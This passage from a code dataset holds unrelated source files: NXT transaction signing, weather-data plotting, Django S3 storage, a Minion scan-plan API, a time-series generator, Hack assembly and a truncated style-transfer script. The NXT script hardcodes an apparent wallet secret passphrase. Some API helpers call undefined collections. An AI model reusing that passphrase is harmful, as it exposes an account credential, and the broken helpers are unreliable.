index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
996,800 | 1bd70b68afbf23af22673ffe3203e643e7eef276 | """
The unsigned transaction of setAccount Property (test1, value1):
{
"transactionJSON": {
"senderPublicKey": "6282332ff83fb3ce267157e5a7d04921f0b7f719aad5bf2117561c2ca7850d19",
"feeNQT": "100000000",
"type": 1,
"version": 1,
"phased": false,
"ecBlockId": "6827938886709383368",
"attachment": {
"property": "test1",
"value": "value1",
"version.AccountProperty": 1
},
"senderRS": "NXT-XWQY-C2MJ-JPL8-F4BW2",
"subtype": 10,
"amountNQT": "0",
"sender": "15019823959905333982",
"recipientRS": "NXT-XWQY-C2MJ-JPL8-F4BW2",
"recipient": "15019823959905333982",
"ecBlockHeight": 1556740,
"deadline": 1,
"timestamp": 127003043,
"height": 2147483647
},
"unsignedTransactionBytes": "011aa3e9910701006282332ff83fb3ce267157e5a7d04921f0b7f719aad5bf2117561c2ca7850d19def20e27502271d0000000000000000000e1f505000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c11700c89063d23db6c15e010574657374310676616c756531",
"broadcasted": false,
"requestProcessingTime": 10
}
{
"signatureHash": "4892f9904048c1a2ddd3125340b4e068255c284ff52e5f462d8527fa213559c3",
"transactionJSON": {
"senderPublicKey": "6282332ff83fb3ce267157e5a7d04921f0b7f719aad5bf2117561c2ca7850d19",
"signature": "2719adcbd0bb05831a2450bf3c4890e27a6560baa2323273260199f6ba8bb0099d2ea4e9225c6f02dbf8a882dbc92283f56de247189d3c2f9ee1082bd243f526",
"feeNQT": "100000000",
"type": 1,
"fullHash": "9338130cf38d7055f25d8c2eeb5bafc3dcc9bd6f9ac224956fc45ff70314da23",
"version": 1,
"phased": false,
"ecBlockId": "6827938886709383368",
"signatureHash": "4892f9904048c1a2ddd3125340b4e068255c284ff52e5f462d8527fa213559c3",
"attachment": {
"property": "test1",
"value": "value1",
"version.AccountProperty": 1
},
"senderRS": "NXT-XWQY-C2MJ-JPL8-F4BW2",
"subtype": 10,
"amountNQT": "0",
"sender": "15019823959905333982",
"recipientRS": "NXT-XWQY-C2MJ-JPL8-F4BW2",
"recipient": "15019823959905333982",
"ecBlockHeight": 1556740,
"deadline": 1,
"transaction": "6156576765634623635",
"timestamp": 127003043,
"height": 2147483647
},
"verify": true,
"requestProcessingTime": 12,
"transactionBytes": "011aa3e9910701006282332ff83fb3ce267157e5a7d04921f0b7f719aad5bf2117561c2ca7850d19def20e27502271d0000000000000000000e1f5050000000000000000000000000000000000000000000000000000000000000000000000002719adcbd0bb05831a2450bf3c4890e27a6560baa2323273260199f6ba8bb0099d2ea4e9225c6f02dbf8a882dbc92283f56de247189d3c2f9ee1082bd243f5260000000004c11700c89063d23db6c15e010574657374310676616c756531",
"fullHash": "9338130cf38d7055f25d8c2eeb5bafc3dcc9bd6f9ac224956fc45ff70314da23",
"transaction": "6156576765634623635"
}
Java sequence for signing :
digest.reset();
byte[] P = new byte[32];
byte[] s = new byte[32];
Curve25519.keygen(P, s, digest.digest(secretPhrase.getBytes("UTF-8")));
byte[] m = digest.digest(message);
System.out.println("sign --> (m) "+m+" "+toHexString(m));
digest.update(m);
byte[] x = digest.digest(s);
System.out.println("sign --> (x) digest(s) "+x+" "+toHexString(x));
byte[] Y = new byte[32];
Curve25519.keygen(Y, null, x);
digest.update(m);
byte[] h = digest.digest(Y);
System.out.println("sign --> (h) digest(Y) "+h+" "+toHexString(h));
byte[] v = new byte[32];
Curve25519.sign(v, h, x, s);
System.out.println("sign --> (v) sign(v, h, x, s) "+v+" "+toHexString(v));
System.out.println("sign --> (h) sign(v, h, x, s) "+h+" "+toHexString(h));
System.arraycopy(v, 0, signature, 0, 32);
System.arraycopy(h, 0, signature, 32, 32);
System.out.println("sign --> (signature) arraycopy( .. v, h) "+signature+" "+toHexString(signature));
if (!Curve25519.isCanonicalSignature(signature)) {
System.out.println("Signature is not canonical");
}
"""
# Demo script: sign the NXT "setAccountProperty" transaction shown in the
# module docstring above, entirely offline, and print the signature.
import transactions.signTransactionOffline as sto
from hashlib import sha256
from curve25519.ToHexString import ToHexString
from curve25519.ParseHexString import ParseHexString as ParseHexString
## My First Account
# Reed-Solomon address of the signing account (informational only).
me = "NXT-XWQY-C2MJ-JPL8-F4BW2"
# Secret passphrase for the account above.
# NOTE(review): a real passphrase must never be committed to source control;
# presumably this is a throwaway test account -- confirm.
sP = "pass dig enough trace frighten foul beaten explain knowledge yeah approach spider"
## sP = "this is a sample of secret pass phrase for test purpose"
# Hex-encoded 32-byte public key matching the passphrase.
pK="6282332ff83fb3ce267157e5a7d04921f0b7f719aad5bf2117561c2ca7850d19"
# "unsignedTransactionBytes" exactly as returned by the NXT API (see docstring).
unsignedTransactionBytes = "011aa3e9910701006282332ff83fb3ce267157e5a7d04921f0b7f719aad5bf2117561c2ca7850d19def20e27502271d0000000000000000000e1f505000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c11700c89063d23db6c15e010574657374310676616c756531"
# Run the offline signer and print the resulting 64-byte signature.
welldone = sto.SignTransactionOffline(sP, unsignedTransactionBytes)
welldone.run()
print("Signature ", welldone.getSignature())
#print("P ", P)
|
996,801 | d4f3a0e5e10d877778b7c3735f0c0bedf82a4f63 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import pylab as plt
import netCDF4
import datetime
import numpy as np
"""
Testing the gridded obs-data as forcing data for SnowHow-Crocus modelling.
Author: kmunve
"""
# Input files: seNorge gridded observations (precipitation, temperature), a
# pre-converted snow/rain product, an observation-based FORCING file, and an
# AROME (har25) forecast file.
precip_f = r"..\Test\Data\snowhow_pilot\seNorge_v2_0_PREC1h_grid_2015011221_2015011221.nc"
precip_mf = r"..\Test\Data\snowhow_pilot\seNorge_v2_0_PREC1h_grid_*.nc"  # glob pattern for MFDataset
temp_f = r"..\Test\Data\snowhow_pilot\seNorge_v2_0_TEMP1h_grid_2015011221.nc"
snowrain_f = r"..\Test\Data\snowhow_pilot\snowrain_only_2015011221.nc"
forc_obs_f = r"..\Test\Data\FORCING_obsgrid.nc"
forc_arome_f = r"..\Test\Data\snowhow_pilot\har25_00_20150112.nc"
# Grid indices of the point used for the time-series plot at the end.
X = 45
Y = 1185
precip_nc = netCDF4.Dataset(precip_f, 'r')
temp_nc = netCDF4.Dataset(temp_f, 'r')
snowrain_nc = netCDF4.Dataset(snowrain_f, 'r')
forc_arome_nc = netCDF4.Dataset(forc_arome_f, 'r')
forc_obs_nc = netCDF4.Dataset(forc_obs_f, 'r')
precip_v = precip_nc.variables['precipitation_amount'] ## mm
temp_v = temp_nc.variables['temperature'] ## Celsius
snowrain_v = snowrain_nc.variables['precipitation_amount']
precip_obs_v = forc_obs_nc.variables["Rainf"]
lat_obs = forc_obs_nc.variables["LAT"][:]
lon_obs = forc_obs_nc.variables["LON"][:]
time_obs = forc_obs_nc.variables["time"][:]
# Sanity check: the precipitation and temperature grids must refer to the same
# time step before they are combined into rain/snow fields below.
time_v = precip_nc.variables['time']
t_p = netCDF4.num2date(time_v[0], time_v.units)
time_v = temp_nc.variables['time']
t_t = netCDF4.num2date(time_v[0], time_v.units)
if t_t == t_p:
    print("Time matches")
else:
    print("Time mismatch")
# AROME forecast fields: accumulated rain and snow fall (kg/m2 == mm).
rainf_arome_v = forc_arome_nc.variables["precipitation_amount_acc"]
rainf_arome = rainf_arome_v[:].squeeze()  # kg/m2 = mm
snowf_arome_v = forc_arome_nc.variables["lwe_thickness_of_snowfall_amount_acc"]
# BUG FIX: snowf_arome was read from rainf_arome_v, silently duplicating the
# rain field; read it from the snow-fall variable instead.
snowf_arome = snowf_arome_v[:].squeeze()  # kg/m2 = mm
time_arome = netCDF4.num2date(forc_arome_nc.variables["time"][:], forc_arome_nc.variables["time"].units)
# Gridded observations for the single time step.
precip = precip_v[:].squeeze() #/ 3600.0
snowrain = snowrain_v[:].squeeze()
temp = temp_v[:].squeeze()
# Simple phase split at +0.5 C: rain where warmer, snow where colder.
rainf = np.ma.masked_where((temp <= 0.5), precip)
snowf = np.ma.masked_where((temp > 0.5), precip)
diff = rainf - snowrain  # difference vs. the pre-converted snow/rain product
N_arome = 21  # AROME time index used by the commented-out comparison below
'''
f, (ax_rf, ax_sf, ax_rf_sf) = plt.subplots(1, 3)
ax_rf.imshow(rainf_arome[N_arome, :, :])
ax_rf.set_title("Rain fall (AROME): {0}".format(time_arome[N_arome]))
#plt.colorbar()
ax_sf.imshow(snowf_arome[N_arome, :, :])
ax_sf.set_title("Snow fall (AROME): {0}".format(time_arome[N_arome]))
#plt.colorbar()
ax_rf_sf.imshow(rainf_arome[N_arome, :, :] - snowf_arome[N_arome, :, :])
ax_rf_sf.set_title("Diff. (AROME): {0}".format(time_arome[N_arome]))
'''
# Observed vs. AROME precipitation side by side, with horizontal colorbars.
f, ([ax_obs, ax_aro], [ax_cobs, ax_caro]) = plt.subplots(2, 2)
im_obs = ax_obs.imshow(precip)
ax_obs.set_title("Precip (obs.grid): {0}".format(t_p))
plt.colorbar(im_obs, cax=ax_cobs, orientation="horizontal")
im_aro = ax_aro.imshow(rainf_arome[21, :, :])
ax_aro.set_title("Precip (AROME): {0}".format(time_arome[21]))
plt.colorbar(im_aro, cax=ax_caro, orientation="horizontal")
# Snow-fall map from the temperature-based split.
plt.figure()
plt.imshow(snowf)
plt.title("Snow fall: {0}".format(t_p))
plt.colorbar()
# Compare the split rain field against the pre-converted product.
f, (ax1, ax2, ax3) = plt.subplots(1, 3)
ax1.imshow(rainf)
ax1.set_title("Precip (grid): {0}".format(t_p))
ax2.imshow(snowrain)
ax2.set_title("Precip (conv): {0}".format(t_p))
ax3.imshow(diff)
ax3.set_title("Difference: {0}".format(t_p))
# Multi-file time series at grid point (Y, X), converted from mm/h to mm/s.
precip_nc_mf = netCDF4.MFDataset(precip_mf)
precip_v_mf = precip_nc_mf.variables['precipitation_amount'] ## mm
precip = precip_v_mf[:].squeeze() / 3600.0
time_v_mf = precip_nc_mf.variables['time']
t_p_mf = netCDF4.num2date(time_v_mf[:], time_v_mf.units)
plt.figure()
plt.plot(t_p_mf, precip[:, Y, X])
plt.show()
|
996,802 | 55ee354ae04fa2a29b471528e601966f158d3ef9 | import matplotlib.pyplot as plt
def loss(history):
    """Plot training vs. validation loss curves from a Keras History object."""
    curves = (('loss', 'b'), ('val_loss', 'r'))
    for key, color in curves:
        plt.plot(history.history[key], color)
    plt.title('Collaborative Filter Loss')
    plt.ylabel('Loss')
    plt.xlabel('Epoch')
    plt.legend(['Train', 'Validation'], loc='upper right')
    plt.show()
996,803 | 9f8eac69a73d32239586841251d5d0649503d5b5 | """
AWS S3 Storage backends.
We override the backends provided by django-storages to add some small pieces
that we need to make our project to work as we want. For example, using
ManifestFilesMixin for static files and OverrideHostnameMixin to make it work
in our Docker Development environment.
"""
# Disable abstract method because we are not overriding all the methods
# pylint: disable=abstract-method
from django.conf import settings
from django.contrib.staticfiles.storage import ManifestFilesMixin
from django.core.exceptions import ImproperlyConfigured
from storages.backends.s3boto3 import S3Boto3Storage
from readthedocs.builds.storage import BuildMediaStorageMixin
from .mixins import OverrideHostnameMixin, S3PrivateBucketMixin
class S3BuildMediaStorage(BuildMediaStorageMixin, OverrideHostnameMixin, S3Boto3Storage):

    """AWS S3 storage backend that serves build artifacts."""

    # Settings are read at class-definition time; the bucket is validated
    # when the storage is instantiated.
    override_hostname = getattr(settings, 'S3_MEDIA_STORAGE_OVERRIDE_HOSTNAME', None)
    bucket_name = getattr(settings, 'S3_MEDIA_STORAGE_BUCKET', None)

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        if self.bucket_name:
            return
        raise ImproperlyConfigured(
            'AWS S3 not configured correctly. '
            'Ensure S3_MEDIA_STORAGE_BUCKET is defined.',
        )
class S3BuildCommandsStorage(S3PrivateBucketMixin, S3Boto3Storage):

    """AWS S3 storage backend holding the (private) build command output."""

    bucket_name = getattr(settings, 'S3_BUILD_COMMANDS_STORAGE_BUCKET', None)

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        if self.bucket_name:
            return
        raise ImproperlyConfigured(
            'AWS S3 not configured correctly. '
            'Ensure S3_BUILD_COMMANDS_STORAGE_BUCKET is defined.',
        )
class S3StaticStorage(OverrideHostnameMixin, ManifestFilesMixin, S3Boto3Storage):

    """
    An AWS S3 Storage backend for static media.

    * Uses Django's ManifestFilesMixin to have unique file paths (eg. core.a6f5e2c.css)
    """

    override_hostname = getattr(settings, 'S3_STATIC_STORAGE_OVERRIDE_HOSTNAME', None)
    bucket_name = getattr(settings, 'S3_STATIC_STORAGE_BUCKET', None)

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        if not self.bucket_name:
            raise ImproperlyConfigured(
                'AWS S3 not configured correctly. '
                'Ensure S3_STATIC_STORAGE_BUCKET is defined.',
            )
        # Static assets are world-readable and served without signed URLs.
        self.default_acl = 'public-read'
        self.bucket_acl = 'public-read'
        self.querystring_auth = False
class S3BuildEnvironmentStorage(S3PrivateBucketMixin, BuildMediaStorageMixin, S3Boto3Storage):

    """AWS S3 storage backend for (private) cached build environments."""

    bucket_name = getattr(settings, 'S3_BUILD_ENVIRONMENT_STORAGE_BUCKET', None)

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        if self.bucket_name:
            return
        raise ImproperlyConfigured(
            'AWS S3 not configured correctly. '
            'Ensure S3_BUILD_ENVIRONMENT_STORAGE_BUCKET is defined.',
        )
|
996,804 | 9845b7909d0ce7c5c324edfc823cf87d630b0ba9 | #!/usr/bin/env python
import calendar
import datetime
import functools
import importlib
import uuid
from flask import jsonify, request
import minion.backend.utils as backend_utils
import minion.backend.tasks as tasks
from minion.backend.app import app
from minion.backend.views.base import api_guard
from minion.backend.models import db, User, Group, Site, Plan, Plugin, Workflow
import json
def _plan_description(plan):
return {
'description': plan['description'],
'name': plan['name'],
'workflow': plan['workflow'],
'created' : plan['created'] }
def get_plan_by_plan_name(plan_name):
    """Thin wrapper around Plan.get_plan, kept for symmetry with other getters."""
    return Plan.get_plan(plan_name)
def get_sanitized_plans():
    # NOTE(review): `plans` is not defined anywhere in this module -- this looks
    # like leftover pymongo code (cursor .find()) from before the SQLAlchemy
    # models were introduced; calling this function raises NameError. Verify
    # whether it is dead code that can be removed.
    return [sanitize_plan(_plan_description(plan)) for plan in plans.find()]
def _check_plan_by_email(email, plan_name):
    """Count how many sites visible to the user's groups use `plan_name`.

    Returns False when the plan does not exist, otherwise the number of
    matching sites (0 is falsy, so callers treat the result as a boolean).

    NOTE(review): `plans`, `sites` and `groups` are undefined in this module;
    presumably legacy pymongo collections left over from a migration -- this
    function would raise NameError if reached. Verify against the model API
    (Plan/Site/Group) used elsewhere in this file.
    """
    plan = plans.find_one({'name': plan_name})
    if not plan:
        return False
    sitez = sites.find({'plans': plan_name})
    if sitez.count():
        matches = 0
        for site in sitez:
            groupz = groups.find({'users': email, 'sites': site['url']})
            if groupz.count():
                matches += 1
        return matches
def get_plans_by_email(email):
    """Return serialized plans attached to any site the user can access.

    Order of first appearance is preserved and duplicate plans are dropped.
    """
    user = User.get_user(email)
    unique_plans = []
    for site_url in user.sites():
        for plan in Site.get_site_by_url(site_url).plans:
            if plan not in unique_plans:
                unique_plans.append(plan)
    return map(lambda plan: plan.dict(), unique_plans)
def permission(view):
    """Decorator restricting plan endpoints to users allowed to see the plan.

    When an `email` query parameter is present, the user must exist; users
    with role 'user' must additionally be linked (via their groups' sites)
    to the requested plan. Requests without `email`, and non-'user' roles,
    fall through to the wrapped view.
    """
    @functools.wraps(view)
    def has_permission(*args, **kwargs):
        email = request.args.get('email')
        if email:
            user = User.get_user(email)
            if not user:
                return jsonify(success=False, reason='User does not exist.')
            if user.role == 'user':
                plan_name = request.view_args['plan_name']
                if not _check_plan_by_email(email, plan_name):
                    return jsonify(success=False, reason="Plan does not exist.")
        return view(*args, **kwargs) # if groupz.count is not zero, or user is admin
    return has_permission
def sanitize_plan(plan):
    """Serialize a Plan model to a plain dict for JSON responses."""
    return plan.dict()
def _split_plugin_class_name(plugin_class_name):
e = plugin_class_name.split(".")
return '.'.join(e[:-1]), e[-1]
def _import_plugin(plugin_class_name):
package_name, class_name = _split_plugin_class_name(plugin_class_name)
plugin_module = importlib.import_module(package_name, class_name)
return getattr(plugin_module, class_name)
def create_workflows_from_json(workflow):
    """Build Workflow models from a JSON workflow list.

    Returns None when any step is missing one of the required keys, so
    callers can treat a falsy result as "invalid plan".
    """
    required = ('plugin_name', 'description', 'configuration')
    # Validate every step up front so nothing is built for a malformed plan.
    for flow in workflow:
        if any(key not in flow for key in required):
            return None
    results = []
    for flow in workflow:
        wf = Workflow()
        wf.plugin_name = flow['plugin_name']
        wf.configuration = json.dumps(flow['configuration'])
        wf.description = flow['description']
        results.append(wf)
    return results
def _check_plan_exists(plan_name):
    """Return True if a plan with the given name exists.

    Rewritten to use the Plan model like the rest of this module; the old
    body referenced an undefined `plans` collection (legacy pymongo) and
    raised NameError when called.
    """
    return Plan.get_plan(plan_name) is not None
# API Methods to manage plans
#
# Return a list of available plans. Plans are global and not
# limited to a specific user.
#
# GET /plans
#
# Returns an array of plan:
#
# { "success": true,
# "plans": [ { "description": "Run an nmap scan",
# "name": "nmap" },
# ... ] }
#
@app.route("/plans", methods=['GET'])
@api_guard
def get_plans():
    """List plans: by ?name= (single plan), by ?email= (user's plans), or all."""
    name = request.args.get('name')
    if name:
        plan = Plan.get_plan(name)
        if not plan:
            return jsonify(success=False, reason="no-such-plan")
        else:
            return jsonify(success=True, plans=[plan.dict()])
    else:
        email = request.args.get('email')
        if email:
            plans = get_plans_by_email(email)
        else:
            # NOTE(review): map() is lazy on Python 3 -- verify jsonify can
            # serialize it, or wrap in list().
            plans = map(lambda x : x.dict(), Plan.query.all())
        return jsonify(success=True, plans=plans)
#
# Delete an existing plan
#
# DELETE /plans/<plan_name>
#
@app.route('/plans/<plan_name>', methods=['DELETE'])
@api_guard
def delete_plan(plan_name):
    """Delete the named plan; responds with success=False if it is unknown."""
    plan = Plan.get_plan(plan_name)
    if not plan:
        return jsonify(success=False, reason="Plan does not exist.")
    # XX assess the impact of deleting a plan against existing scans?
    db.session.delete(plan)
    db.session.commit()
    return jsonify(success=True)
#
# Create a new plan
#
@app.route("/plans", methods=['POST'])
@api_guard('application/json')
def create_plan():
    """Create a plan (with its workflow steps) from the posted JSON body."""
    plan = request.json
    # Verify incoming plan
    if Plan.get_plan(plan['name']) is not None:
        return jsonify(success=False, reason='plan-already-exists')
    workflows = create_workflows_from_json(plan['workflow'])
    if not workflows:
        return jsonify(success=False, reason='invalid-plan-exists')
    # Create the plan
    new_plan = Plan()
    new_plan.name = plan['name']
    new_plan.description = plan['description']
    db.session.add(new_plan)
    db.session.commit()
    # Persist each workflow step and attach it to the plan.
    for workflow in workflows:
        db.session.add(workflow)
        new_plan.workflows.append(workflow)
    db.session.commit()
    # Re-read through the model API so the response reflects committed state.
    plan = Plan.get_plan(new_plan.name)
    # Return the new plan
    if not plan:
        return jsonify(success=False)
    return jsonify(success=True, plan=sanitize_plan(plan))
#
# Update a plan
#
@app.route('/plans/<plan_name>', methods=['POST'])
@api_guard
@permission
def update_plan(plan_name):
    """Replace a plan's name/description and its entire workflow list."""
    plan = Plan.get_plan(plan_name)
    if not plan:
        return jsonify(success=False, reason='no-such-plan')
    new_plan = request.json
    new_workflow = create_workflows_from_json(new_plan['workflow'])
    if not new_workflow:
        return jsonify(success=False, reason='invalid-plan')
    plan.name = new_plan.get("name", plan.name)
    plan.description = new_plan.get("description", plan.description)
    # Detach all existing workflow steps. The identity map() makes a copy on
    # Python 2; NOTE(review): on Python 3 map() is lazy, so this removes from
    # plan.workflows while iterating it -- verify.
    old_flows = map(lambda x: x, plan.workflows)
    for flow in old_flows:
        plan.workflows.remove(flow)
    # Attach the replacement steps.
    for new_flow in new_workflow:
        db.session.add(new_flow)
        plan.workflows.append(new_flow)
    db.session.commit()
    return jsonify(success=True, plan=sanitize_plan(Plan.get_plan(plan.name)))
#
# Return a single plan description. Takes the plan name.
#
# GET /plans/:plan_name
#
# Returns a JSON structure that contains the complete plan
#
# { "success": true,
# "plan": { "description": "Run an nmap scan",
# "name": "nmap",
# "workflow": [ { "configuration": {},
# "description": "Run the NMAP scanner.",
# "plugin": { "version": "0.2",
# "class": "minion.plugins.nmap.NMAPPlugin",
# "weight": "light",
# "name": "NMAP" } } ] }
#
@app.route("/plans/<plan_name>", methods=['GET'])
@api_guard
@permission
def get_plan(plan_name):
    """Return the full serialized plan for `plan_name`."""
    plan = get_plan_by_plan_name(plan_name)
    if plan:
        return jsonify(success=True, plan=sanitize_plan(plan))
    return jsonify(success=False, reason="Plan does not exist")
|
996,805 | 463c16a1c980915894b73fc8ad3b5db0bdde9816 | from urllib.request import urlopen
def fetch_words_from_url():
    """Download a sample text and print its words as a list of strings."""
    with urlopen('http://sixty-north.com/c/t.txt') as story:
        words = [word.decode('utf-8')
                 for line in story
                 for word in line.split()]
        print(words)
# Run only when executed as a script, not when imported as a module.
if __name__ == '__main__':
    fetch_words_from_url()
996,806 | 5d869948e75a17bdc0b05a3fe122cbb5422c1f99 | from __future__ import print_function
def check_hash(giv_str):
    """Hash a string over the 16-letter alphabet: h = h * 37 + index, seed 7."""
    alphabet = "acdegilmnoprstuw"
    result = 7
    for ch in giv_str:
        result = result * 37 + alphabet.index(ch)
    return result
def reverse_hash(h):
    """Invert check_hash: peel base-37 digits until only the seed (7) remains.

    BUG FIX: the original used `h /= 37`, which on Python 3 produces floats
    and loses precision for large hashes, corrupting the recovered word.
    Floor division keeps everything in exact integers (identical on Python 2).
    """
    letters = "acdegilmnoprstuw"
    indices = []
    # Each iteration strips the least-significant base-37 digit; the loop
    # stops once only the seed value 7 is left (all digit values are < 16).
    while h > 37:
        indices.append(h % 37)
        h //= 37
    return "".join(letters[i] for i in reversed(indices))
if __name__ == '__main__':
    # Round-trip self-check: reversing then re-hashing must reproduce the number.
    print(check_hash(reverse_hash(930846109532517)) == 930846109532517)
|
996,807 | fc0dfa538824b623ea1d673153669100eb51f4c1 | from math import ceil
from typing import List, Optional, Tuple
import numpy as np
import pandas as pd
from time_series_expectations.generator.daily_time_series_generator import (
DailyTimeSeriesGenerator,
)
from time_series_expectations.generator.time_series_generator import TrendParams
class HourlyTimeSeriesGenerator(DailyTimeSeriesGenerator):
    """Generate an hourly time series with trend, seasonality, and outliers."""

    def _generate_hourly_seasonality(
        self,
        time_range: np.ndarray,
        hourly_seasonality_params: List[Tuple[float, float]],
    ) -> np.ndarray:
        """Generate an hourly (24-hour period) seasonality component.

        Each (alpha, beta) pair adds one Fourier harmonic: alpha scales the
        cosine term and beta the sine term of frequency (i + 1) cycles/day.
        """
        return sum(
            [
                alpha * np.cos(2 * np.pi * (i + 1) * time_range / 24)
                + beta * np.sin(2 * np.pi * (i + 1) * time_range / 24)
                for i, (alpha, beta) in enumerate(hourly_seasonality_params)
            ]
        )

    def _generate_hourly_time_series(
        self,
        size: int,
        hourly_seasonality: float,
        hourly_seasonality_params: Optional[List[Tuple[float, float]]] = None,
        trend_params: Optional[List[TrendParams]] = None,
        weekday_dummy_params: Optional[List[float]] = None,
        annual_seasonality_params: Optional[List[Tuple[float, float]]] = None,
        holiday_alpha: float = 3.5,
        outlier_alpha: float = 2.5,
        noise_scale: float = 1.0,
    ):
        """Generate an hourly time series.

        Builds a daily base series, repeats each daily value for 24 hours,
        modulates it multiplicatively by the hourly seasonal component, and
        adds hourly-resolution outliers on top.
        """
        if hourly_seasonality_params is None:
            # Create 4 random (cosine, sine) harmonics with small amplitudes.
            hourly_seasonality_params = [
                (
                    np.random.normal() / 100,
                    np.random.normal() / 100,
                )
                for i in range(4)
            ]
        time_range = np.arange(size)
        hourly_seasonality_series = (
            self._generate_hourly_seasonality(
                time_range=time_range,
                hourly_seasonality_params=hourly_seasonality_params,
            )
            * hourly_seasonality
        )
        # Hourly-resolution outliers via the parent's posneg-pareto helper.
        hourly_outliers = self._generate_posneg_pareto(outlier_alpha, size)
        daily_time_series = self._generate_daily_time_series(
            size=ceil(size / 24),
            trend_params=trend_params,
            weekday_dummy_params=weekday_dummy_params,
            annual_seasonality_params=annual_seasonality_params,
            holiday_alpha=holiday_alpha,
            # NOTE(review): the huge alpha suppresses daily-level outliers, so
            # outliers effectively only come from hourly_outliers above --
            # confirm this is intentional (the caller's outlier_alpha is
            # silently ignored for the daily component).
            outlier_alpha=1000000,  # outlier_alpha,
            noise_scale=noise_scale,
        )
        # exp() makes the hourly seasonality a multiplicative factor; the daily
        # series is repeated 24x and truncated to exactly `size` hours.
        return (
            np.exp(hourly_seasonality_series) * np.repeat(daily_time_series, 24)[:size]
            + hourly_outliers
        )

    def generate_df(
        self,
        size: Optional[int] = 90 * 24,  # 90 days worth of data
        start_date: Optional[str] = "2018-01-01",
        hourly_seasonality: float = 1.0,
        hourly_seasonality_params: Optional[List[Tuple[float, float]]] = None,
        trend_params: Optional[List[TrendParams]] = None,
        weekday_dummy_params: Optional[List[float]] = None,
        annual_seasonality_params: Optional[List[Tuple[float, float]]] = None,
        holiday_alpha: float = 3.5,
        outlier_alpha: float = 2.5,
        noise_scale: float = 1.0,
    ) -> pd.DataFrame:
        """Generate a time series as a pandas dataframe.

        Keyword Args:
            size: The number of hourly observations (defaults to 90 days * 24).
            start_date: The start date of the time series.
            hourly_seasonality: Overall multiplier applied to the hourly seasonal component.
            hourly_seasonality_params: Fourier (cosine, sine) amplitude pairs for the 24-hour cycle; small random values are used when omitted.
            trend_params: A list of trend parameters corresponding to cutpoints in the time series.
            weekday_dummy_params: A list of weekday dummy parameters. Should be a list of length 7, with each day corresponding to the average difference in the time series on that day.
            annual_seasonality_params: A list of annual seasonality parameters used to create a cyclic component in the time series.
            holiday_alpha: The alpha parameter for the pareto distribution used to generate holiday effects.
            outlier_alpha: The alpha parameter for the pareto distribution used to generate outlier effects.
            noise_scale: The scale parameter for the standard deviation of the normal distribution used to generate noise.

        Returns:
            A pandas dataframe with a date column ("ds", hourly frequency) and a time series column ("y").

        Notes:
            * Holiday and outlier effects are generated using a pareto distribution. The alpha parameter controls the shape of the distribution. A higher alpha value will result in more extreme holiday and outlier effects.
            * Holidays don't correspond to actual holidays. Instead, they are generated by randomly selecting days in the time series.
            * Annual seasonality is generated by Fourier series. The number of fourier terms is determined by the length of the annual_seasonality_params list. The first element of each tuple in the list is the amplitude of the sine term, and the second element is the amplitude of the cosine term.
        """
        return pd.DataFrame(
            {
                "ds": pd.date_range(start_date, periods=size, freq="60min"),
                "y": self._generate_hourly_time_series(
                    size=size,
                    hourly_seasonality=hourly_seasonality,
                    hourly_seasonality_params=hourly_seasonality_params,
                    trend_params=trend_params,
                    weekday_dummy_params=weekday_dummy_params,
                    annual_seasonality_params=annual_seasonality_params,
                    holiday_alpha=holiday_alpha,
                    outlier_alpha=outlier_alpha,
                    noise_scale=noise_scale,
                ),
            }
        )
|
996,808 | 2c4b2519b277926b42327e40a92807faf645f222 | from .iterator import Iterator
from .map import map
|
996,809 | 71a24f817e08a41dd2f0acbd2154d72dd64f2b89 | //push constant 0
// Hack assembly emitted by a VM translator (nand2tetris projects 7/8).
// VM program: local 0 = 0; then LOOP_START: local 0 += argument 0;
// argument 0 -= 1; jump back while argument 0 != 0; finally push local 0.
// Net effect: pushes the sum 1 + 2 + ... + argument0 onto the stack.
// R13 is used as a scratch register to hold pop-target addresses.
@0
D=A
@SP
A=M
M=D
@SP
M=M+1
//pop local 0
@LCL
D=M
@0
D=A+D
@R13
M=D
@SP
M=M-1
A=M
D=M
@R13
A=M
M=D
//label LOOP_START
(LOOP_START)
//push argument 0
@ARG
D=M
@0
A=A+D
D=M
@SP
A=M
M=D
@SP
M=M+1
//push local 0
@LCL
D=M
@0
A=A+D
D=M
@SP
A=M
M=D
@SP
M=M+1
//add
@SP
M=M-1
A=M
D=M
A=A-1
M=D+M
//pop local 0
@LCL
D=M
@0
D=A+D
@R13
M=D
@SP
M=M-1
A=M
D=M
@R13
A=M
M=D
//push argument 0
@ARG
D=M
@0
A=A+D
D=M
@SP
A=M
M=D
@SP
M=M+1
//push constant 1
@1
D=A
@SP
A=M
M=D
@SP
M=M+1
//sub: sub
@SP
M=M-1
A=M
D=M
A=A-1
M=M-D
//pop argument 0
@ARG
D=M
@0
D=A+D
@R13
M=D
@SP
M=M-1
A=M
D=M
@R13
A=M
M=D
//push argument 0
@ARG
D=M
@0
A=A+D
D=M
@SP
A=M
M=D
@SP
M=M+1
//if-gotoLOOP_START
@SP
M=M-1
A=M
D=M
@LOOP_START
D;JNE
//push local 0
@LCL
D=M
@0
A=A+D
D=M
@SP
A=M
M=D
@SP
M=M+1
|
996,810 | 4d88712fd3ca77ba5eac9355bc4c64e47f5d6f0c |
from keras.layers import Input, Lambda, Dense, Flatten
from keras.layers import AveragePooling2D, MaxPooling2D
from keras.layers.convolutional import Conv2D
from keras.models import Model, Sequential
from keras.applications.vgg16 import VGG16
from keras.applications.vgg16 import preprocess_input
from keras.preprocessing import image
from skimage.transform import resize
import keras.backend as K
import numpy as np
import matplotlib.pyplot as plt
from Optimizer import VGG16_AvgPool, VGG16_AvgPool_CutOff, unpreprocess, scale_img
from Styling import gram_matrix, style_loss, minimize
from scipy.optimize import fmin_l_bfgs_b
# load the content image
def load_img_and_preprocess(path, shape=None):
    """Load an image file (optionally resized) as a VGG16-preprocessed batch."""
    pil_img = image.load_img(path, target_size=shape)
    arr = image.img_to_array(pil_img)
